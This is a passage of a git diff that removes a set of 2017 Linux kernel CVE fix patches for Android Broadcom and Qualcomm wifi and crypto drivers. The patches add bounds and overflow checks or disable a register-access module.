-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- 	}
- 
- 	change_array = &params->change_array[params->results_rxed_so_far];
--	memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+	if ((params->results_rxed_so_far + results->pkt_count) >
-+		results->total_count) {
-+		DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+		*send_evt_bytes = 0;
-+		kfree(params->change_array);
-+		params->change_array = NULL;
-+		return ptr;
-+	}
-+
-+	memcpy(change_array, results->list,
-+		sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- 	params->results_rxed_so_far += results->pkt_count;
- 
- 	if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- 						/* allows only supported channel on
- 						*  current reguatory
- 						*/
-+						if (n_nodfs >= num_chans)
-+							break;
-+
- 						if (channel == (dtoh32(list->element[j])))
- 							default_chan_list[n_nodfs++] =
- 								channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 	struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
- 
--	WL_ERR((">>> PNO Event\n"));
-+	if (!data) {
-+		WL_ERR(("Data is NULL!\n"));
-+		return 0;
-+	}
- 
-+	WL_DBG((">>> PNO Event\n"));
- 	ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
- 
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0570/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c     | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c |  9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- 	}
- 
- 	change_array = &params->change_array[params->results_rxed_so_far];
--	memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+	if ((params->results_rxed_so_far + results->pkt_count) >
-+		results->total_count) {
-+		DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+		*send_evt_bytes = 0;
-+		kfree(params->change_array);
-+		params->change_array = NULL;
-+		return ptr;
-+	}
-+
-+	memcpy(change_array, results->list,
-+		sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- 	params->results_rxed_so_far += results->pkt_count;
- 
- 	if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- 						/* allows only supported channel on
- 						*  current reguatory
- 						*/
-+						if (n_nodfs >= num_chans)
-+							break;
-+
- 						if (channel == (dtoh32(list->element[j])))
- 							default_chan_list[n_nodfs++] =
- 								channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 	struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
- 
--	WL_ERR((">>> PNO Event\n"));
-+	if (!data) {
-+		WL_ERR(("Data is NULL!\n"));
-+		return 0;
-+	}
- 
-+	WL_DBG((">>> PNO Event\n"));
- 	ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
- 
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch
deleted file mode 100644
index d1ac526c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0571/3.10/0001.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From 4b29d0111186ebef75a9af7da8257697386ac4a4 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 25 Jan 2017 11:41:49 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in wlfc reordering
-
-added boundary check not to override allocated buffer
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Iad44141ba4e4cd224eda292c05ffe525bf74227d
-Bug: 34203305
----
- drivers/net/wireless/bcmdhd/dhd_wlfc.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_wlfc.c b/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-index 741ebc8642275..3b9cfe85f7635 100644
---- a/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_wlfc.c
-@@ -2458,7 +2458,7 @@ static void
- _dhd_wlfc_reorderinfo_indicate(uint8 *val, uint8 len, uchar *info_buf, uint *info_len)
- {
- 	if (info_len) {
--		if (info_buf) {
-+		if (info_buf && (len <= WLHOST_REORDERDATA_TOTLEN)) {
- 			bcopy(val, info_buf, len);
- 			*info_len = len;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch
deleted file mode 100644
index bc7e20a9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0572/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 3afb019c44d750086f8d5228f8c934da2910d8df Mon Sep 17 00:00:00 2001
-From: gwx419604 <gwx419604@notesmail.huawei.com>
-Date: Mon, 20 Mar 2017 15:11:22 +0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- dhd_pno_process_anqpo_result
-
-CVE-2017-0572
-
-added boundary check not to overflow buffer
-especially when input parameters manipulated.
-
-
-Bug: 34198931
-Change-Id: I39d7dc38a597a938d37dbd7bb267a7ff4df93e45
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Signed-off-by: gwx419604 <gwx419604@notesmail.huawei.com>
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 21 +++++++++++++++++----
- 1 file changed, 17 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index f3f2a6f2e7aac..ab9bede10e30d 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3631,8 +3631,8 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- 	u32 bi_length = 0;
- 	uint8 channel;
- 	uint32 mem_needed;
--
- 	struct timespec ts;
-+	wl_event_gas_t *gas_data;
- 
- 	*size = 0;
- 
-@@ -3653,9 +3653,22 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- 		DHD_ERROR(("Invalid bss_info length %d: ignoring\n", bi_length));
- 		goto exit;
- 	}
--	if (bi->SSID_len > DOT11_MAX_SSID_LEN) {
--		DHD_ERROR(("Invalid SSID length %d: trimming it to max\n", bi->SSID_len));
--		bi->SSID_len = DOT11_MAX_SSID_LEN;
-+	if ((bi->SSID_len > DOT11_MAX_SSID_LEN)||
-+		(bi->ie_length > (*size - sizeof(wl_bss_info_t))) ||
-+		(bi->ie_offset < sizeof(wl_bss_info_t)) ||
-+		(bi->ie_offset > (sizeof(wl_bss_info_t) + bi->ie_length))){
-+		DHD_ERROR(("%s: tot:%d,SSID:%d,ie_len:%d,ie_off:%d\n",
-+			__FUNCTION__, *size, bi->SSID_len,
-+			bi->ie_length, bi->ie_offset));
-+		return NULL;
-+	}
-+
-+	gas_data = (wl_event_gas_t *)((uint8 *)data + bi->ie_offset + bi->ie_length);
-+
-+	if (gas_data->data_len > (*size - (bi->ie_offset + bi->ie_length))) {
-+		DHD_ERROR(("%s: wrong gas_data_len:%d\n",
-+			__FUNCTION__, gas_data->data_len));
-+		return NULL;
- 	}
- 
- 	mem_needed = OFFSETOF(wifi_gscan_result_t, ie_data) + bi->ie_length;
diff --git a/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch
deleted file mode 100644
index cd084634..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0573/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 3d9f2799fd13d1125ab4b3d74a523bd7f2e566f3 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Tue, 31 Jan 2017 16:18:40 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- wl_android_set_roampref
-
-added boundary check not to override allocated buffer.
-Specially when user input corrupted or manipulated.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Id6196da10111517696eda5f186b1e2dd19f66085
-Bug: 34469904
----
- drivers/net/wireless/bcmdhd/wl_android.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index 46b00bd913835..c415bfcba0f6a 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -936,8 +936,8 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
- 	uint8 buf[MAX_BUF_SIZE];
- 	uint8 *pref = buf;
- 	char *pcmd;
--	int num_ucipher_suites = 0;
--	int num_akm_suites = 0;
-+	uint num_ucipher_suites;
-+	uint num_akm_suites;
- 	wpa_suite_t ucipher_suites[MAX_NUM_SUITES];
- 	wpa_suite_t akm_suites[MAX_NUM_SUITES];
- 	int num_tuples = 0;
-@@ -950,6 +950,10 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
- 	total_len_left = total_len - strlen(CMD_SET_ROAMPREF) + 1;
- 
- 	num_akm_suites = simple_strtoul(pcmd, NULL, 16);
-+	if (num_akm_suites > MAX_NUM_SUITES) {
-+		WL_ERR(("wrong num_akm_suites:%d.\n", num_akm_suites));
-+		return BCME_ERROR;
-+	}
- 	/* Increment for number of AKM suites field + space */
- 	pcmd += 3;
- 	total_len_left -= 3;
-@@ -975,6 +979,10 @@ wl_android_set_roampref(struct net_device *dev, char *command, int total_len)
- 
- 	total_len_left -= (num_akm_suites * WIDTH_AKM_SUITE);
- 	num_ucipher_suites = simple_strtoul(pcmd, NULL, 16);
-+	if (num_ucipher_suites > MAX_NUM_SUITES) {
-+		WL_ERR(("wrong num_ucipher_suites:%d.\n", num_ucipher_suites));
-+		return BCME_ERROR;
-+	}
- 	/* Increment for number of cipher suites field + space */
- 	pcmd += 3;
- 	total_len_left -= 3;
diff --git a/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch
deleted file mode 100644
index cee6f2f8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0574/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From e55ddf68568a33288d76f5e00c93f8157cb9a632 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Fri, 27 Jan 2017 17:14:19 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Fix for arbitrary memory free.
-
-Fix for arbitrary memory free in nexus6p's wifi driver
-function wl_cfgvendor_dbg_get_mem_dump. Current fix
-includes intialize mem_buf to NULL and check if the
-len is valid or not. Also check if buf_len is valid
-or not. If buf_len is not valid then mem_buf will be
-set to NULL.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-
-Change-Id: Ia98ce18f0437d38d6f6d77033af7477ae12574e3
-Bug: 34624457
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 29 ++++++++++++++++++++++++++---
- 1 file changed, 26 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 9a73de20f1298..1f5152f66ab36 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -2283,7 +2283,7 @@ static int wl_cfgvendor_dbg_get_mem_dump(struct wiphy *wiphy,
- 	int buf_len = 0;
- 	void __user *user_buf = NULL;
- 	const struct nlattr *iter;
--	char *mem_buf;
-+	char *mem_buf = NULL;
- 	struct sk_buff *skb;
- 	struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- 
-@@ -2291,10 +2291,33 @@ static int wl_cfgvendor_dbg_get_mem_dump(struct wiphy *wiphy,
- 		type = nla_type(iter);
- 		switch (type) {
- 			case DEBUG_ATTRIBUTE_FW_DUMP_LEN:
--				buf_len = nla_get_u32(iter);
-+				/* Check if the iter is valid and
-+				 * buffer length is not already initialized.
-+				 */
-+				if ((nla_len(iter) == sizeof(uint32)) &&
-+					!buf_len) {
-+					buf_len = nla_get_u32(iter);
-+					if (buf_len <= 0) {
-+						ret = BCME_ERROR;
-+						goto exit;
-+					}
-+				} else {
-+					ret = BCME_ERROR;
-+					goto exit;
-+				}
- 				break;
- 			case DEBUG_ATTRIBUTE_FW_DUMP_DATA:
--				user_buf = (void __user *)(unsigned long) nla_get_u64(iter);
-+				if (nla_len(iter) != sizeof(uint64)) {
-+					WL_ERR(("Invalid len\n"));
-+					ret = BCME_ERROR;
-+					goto exit;
-+				}
-+				user_buf =
-+				(void __user *)(unsigned long)nla_get_u64(iter);
-+				if (!user_buf) {
-+					ret = BCME_ERROR;
-+					goto exit;
-+				}
- 				break;
- 			default:
- 				WL_ERR(("Unknown type: %d\n", type));
diff --git a/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch
deleted file mode 100644
index e034def0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0575/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From a4f790c140d9813c3af66a9b367b4568e053278a Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Goswami <agoswa@codeaurora.org>
-Date: Fri, 23 Dec 2016 13:20:45 +0530
-Subject: qcacld-2.0: Avoid integer overflow in wma_enable_arp_ns_offload
-
-In the function wma_enable_arp_ns_offload(), the len variable is
-defined as signed 32 bit, whereas wmi_buf_alloc() takes unsigned
-16 bit as input also there is no limit on input of
-num_ns_offload_count.
-
-Fix is to define the len variable in wma_enable_arp_ns_offload()
-as unsigned 32 bit. The length input for wmi_buf_alloc() is also
-extended and re-defined as unsigned 32 bit. Add limit check before
-using num_ns_offload_count.
-
-Change-Id: I5063df9551074e964eef67abeb8afcf104e50808
-CRs-Fixed: 1103099
----
- CORE/SERVICES/COMMON/wmi_unified_api.h | 4 ++--
- CORE/SERVICES/WMA/wma.c                | 9 +++++++--
- CORE/SERVICES/WMI/wmi_unified.c        | 4 ++--
- 3 files changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/SERVICES/COMMON/wmi_unified_api.h b/CORE/SERVICES/COMMON/wmi_unified_api.h
-index cd9f923..2912d47 100644
---- a/CORE/SERVICES/COMMON/wmi_unified_api.h
-+++ b/CORE/SERVICES/COMMON/wmi_unified_api.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -69,7 +69,7 @@ wmi_unified_remove_work(struct wmi_unified* wmi_handle);
-  *  @return wmi_buf_t.
-  */
- wmi_buf_t
--wmi_buf_alloc(wmi_unified_t wmi_handle, u_int16_t len);
-+wmi_buf_alloc(wmi_unified_t wmi_handle, uint32_t len);
- 
- 
- /**
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index f09c8fd..c802405 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -22719,7 +22719,7 @@ static VOS_STATUS wma_enable_arp_ns_offload(tp_wma_handle wma, tpSirHostOffloadR
- 	WMI_ARP_OFFLOAD_TUPLE *arp_tuple;
- 	A_UINT8* buf_ptr;
- 	wmi_buf_t buf;
--	int32_t len;
-+	uint32_t len;
- 	u_int8_t vdev_id;
- 	uint32_t count = 0, num_ns_ext_tuples = 0;
- 
-@@ -22740,6 +22740,11 @@ static VOS_STATUS wma_enable_arp_ns_offload(tp_wma_handle wma, tpSirHostOffloadR
- 	if (!bArpOnly)
- 		count = pHostOffloadParams->num_ns_offload_count;
- 
-+	if (count >= SIR_MAC_NUM_TARGET_IPV6_NS_OFFLOAD_NA) {
-+		vos_mem_free(pHostOffloadParams);
-+		return VOS_STATUS_E_FAILURE;
-+	}
-+
- 	len = sizeof(WMI_SET_ARP_NS_OFFLOAD_CMD_fixed_param) +
- 		WMI_TLV_HDR_SIZE + // TLV place holder size for array of NS tuples
- 		WMI_MAX_NS_OFFLOADS*sizeof(WMI_NS_OFFLOAD_TUPLE) +
-diff --git a/CORE/SERVICES/WMI/wmi_unified.c b/CORE/SERVICES/WMI/wmi_unified.c
-index 463a324..c0663d3 100644
---- a/CORE/SERVICES/WMI/wmi_unified.c
-+++ b/CORE/SERVICES/WMI/wmi_unified.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -131,7 +131,7 @@ uint16_t wmi_get_max_msg_len(wmi_unified_t wmi_handle)
- }
- 
- wmi_buf_t
--wmi_buf_alloc(wmi_unified_t wmi_handle, u_int16_t len)
-+wmi_buf_alloc(wmi_unified_t wmi_handle, uint32_t len)
- {
- 	wmi_buf_t wmi_buf;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch
deleted file mode 100644
index 403119ec..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0576/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 2b09507d78b25637df6879cd2ee2031b208b3532 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Thu, 19 Jan 2017 14:59:44 -0800
-Subject: crypto: msm: check integer overflow on total data len in qcedev.c
-
-qcedev_vbuf_ablk_cipher will calculate total data length. It starts
-with the value of "areq->cipher_op_req.byteoffset", which is controlled
-by the user. Make change to check if this total data length has integer
-overflow issue in qcedev_check_cipher_params.
-
-Change-Id: Ice42dca6d47eb8febfe8a34e566c69e4799fab57
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 9ab03209b..a629c62 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1445,6 +1445,15 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 			pr_err("%s: Invalid byte offset\n", __func__);
- 			goto error;
- 		}
-+		total = req->byteoffset;
-+		for (i = 0; i < req->entries; i++) {
-+			if (total > U32_MAX - req->vbuf.src[i].len) {
-+				pr_err("%s:Integer overflow on total src len\n",
-+					__func__);
-+				goto error;
-+			}
-+			total += req->vbuf.src[i].len;
-+		}
- 	}
- 
- 	if (req->data_len < req->byteoffset) {
-@@ -1480,7 +1489,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 		}
- 	}
- 	/* Check for sum of all dst length is equal to data_len  */
--	for (i = 0; i < req->entries; i++) {
-+	for (i = 0, total = 0; i < req->entries; i++) {
- 		if (req->vbuf.dst[i].len >= U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req dst vbuf length\n",
- 				__func__);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch
deleted file mode 100644
index 52c6a22d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0583/3.10/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b8f70068650a6e6bef0a41de2e30c17087d3a84d Mon Sep 17 00:00:00 2001
-From: Srinivasarao P <spathi@codeaurora.org>
-Date: Tue, 14 Feb 2017 13:52:08 +0530
-Subject: defconfig: disable cp_access
-
-cpaccess module gives userspace control over system control
-registers so disable cp_access module.
-
-Change-Id: Ib49412957f91ce65f4350c5c72358b1c53eed43e
-Signed-off-by: Srinivasarao P <spathi@codeaurora.org>
----
- arch/arm/configs/msm8916-perf_defconfig | 2 +-
- arch/arm/configs/msm8916_defconfig      | 2 +-
- arch/arm64/configs/msm_defconfig        | 2 +-
- 3 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/configs/msm8916-perf_defconfig b/arch/arm/configs/msm8916-perf_defconfig
-index 08a43de..94d2321 100644
---- a/arch/arm/configs/msm8916-perf_defconfig
-+++ b/arch/arm/configs/msm8916-perf_defconfig
-@@ -64,7 +64,7 @@ CONFIG_AEABI=y
- CONFIG_BALANCE_ANON_FILE_RECLAIM=y
- CONFIG_HIGHMEM=y
- CONFIG_ENABLE_VMALLOC_SAVING=y
--CONFIG_CP_ACCESS=y
-+# CONFIG_CP_ACCESS is not set
- CONFIG_AUTO_ZRELADDR=y
- CONFIG_ARM_DECOMPRESSOR_LIMIT=0x3200000
- CONFIG_SCHED_FREQ_INPUT=y
-diff --git a/arch/arm/configs/msm8916_defconfig b/arch/arm/configs/msm8916_defconfig
-index b7caf59..30a81e3 100644
---- a/arch/arm/configs/msm8916_defconfig
-+++ b/arch/arm/configs/msm8916_defconfig
-@@ -62,7 +62,7 @@ CONFIG_AEABI=y
- CONFIG_BALANCE_ANON_FILE_RECLAIM=y
- CONFIG_HIGHMEM=y
- CONFIG_ENABLE_VMALLOC_SAVING=y
--CONFIG_CP_ACCESS=y
-+# CONFIG_CP_ACCESS is not set
- CONFIG_AUTO_ZRELADDR=y
- CONFIG_ARM_DECOMPRESSOR_LIMIT=0x3200000
- CONFIG_SCHED_FREQ_INPUT=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 4a26793..d8e8a826 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -528,7 +528,7 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS=y
- CONFIG_SENSORS_SSC=y
--CONFIG_CP_ACCESS64=y
-+# CONFIG_CP_ACCESS64 is not set
- CONFIG_MSM_GLADIATOR_ERP=y
- CONFIG_MSM_BAM_DMUX=y
- CONFIG_MSM_IPC_ROUTER_SMD_XPRT=y
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch
deleted file mode 100644
index e3799be1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0583/3.18/0002.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 452d2ad331d20b19e8a0768c4b6e7fe1b65abe8f Mon Sep 17 00:00:00 2001
-From: Bruce Levy <blevy@codeaurora.org>
-Date: Wed, 27 Jan 2016 17:37:33 -0800
-Subject: defconfig: msm: Disable CONFIG_CP_ACCESS64
-
-Disable the cpaccess64 driver.
-This driver allows user space access to cpu registers.
-With this driver enabled, a CTS test causes the
-system to crash.
-
-CRs-Fixed: 968777
-Change-Id: I3ebe7220c7ca68a25b781c2e836a735d11dcaf08
-Signed-off-by: Bruce Levy <blevy@codeaurora.org>
----
- arch/arm64/configs/msm-perf_defconfig | 1 -
- arch/arm64/configs/msm_defconfig      | 1 -
- 2 files changed, 2 deletions(-)
-
-diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig
-index fad17d9..37158e6 100644
---- a/arch/arm64/configs/msm-perf_defconfig
-+++ b/arch/arm64/configs/msm-perf_defconfig
-@@ -496,7 +496,6 @@ CONFIG_GPIO_USB_DETECT=y
- CONFIG_MSM_SPMI=y
- CONFIG_MSM_SPMI_PMIC_ARB=y
- CONFIG_MSM_QPNP_INT=y
--CONFIG_CP_ACCESS64=y
- CONFIG_MSM_ADSP_LOADER=y
- CONFIG_MSM_MEMORY_DUMP_V2=y
- CONFIG_MSM_BOOT_STATS=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 6f1e808..80ae314 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -503,7 +503,6 @@ CONFIG_GPIO_USB_DETECT=y
- CONFIG_MSM_SPMI=y
- CONFIG_MSM_SPMI_PMIC_ARB=y
- CONFIG_MSM_QPNP_INT=y
--CONFIG_CP_ACCESS64=y
- CONFIG_MSM_ADSP_LOADER=y
- CONFIG_MSM_MEMORY_DUMP_V2=y
- CONFIG_MSM_BOOT_STATS=y
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch
deleted file mode 100644
index cbd5fda6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0584/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From b83b9057d56c057d1dfca79ae197583a83766245 Mon Sep 17 00:00:00 2001
-From: Govind Singh <govinds@codeaurora.org>
-Date: Thu, 12 Jan 2017 10:30:25 +0530
-Subject: qcacld-2.0: Do not copy buffer to user-space if diag read fails
-
-ATH diag procfs read is copying read_buffer to user space
-unconditionally, causing kernel heap information leak of
-uninitialized read_buffer if hif diag read fails.
-
-Do not copy buffer to user space if diag read fails to
-avoid information leak to user space.
-
-Change-Id: I5e07cad4f90e5e9b3c461268b8fa3635c3128b9f
-CRs-Fixed: 1104731
----
- CORE/SERVICES/HIF/ath_procfs.c | 11 +++++------
- 1 file changed, 5 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/SERVICES/HIF/ath_procfs.c b/CORE/SERVICES/HIF/ath_procfs.c
-index cfdf97a..d1a34dd 100644
---- a/CORE/SERVICES/HIF/ath_procfs.c
-+++ b/CORE/SERVICES/HIF/ath_procfs.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013, 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013, 2016-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
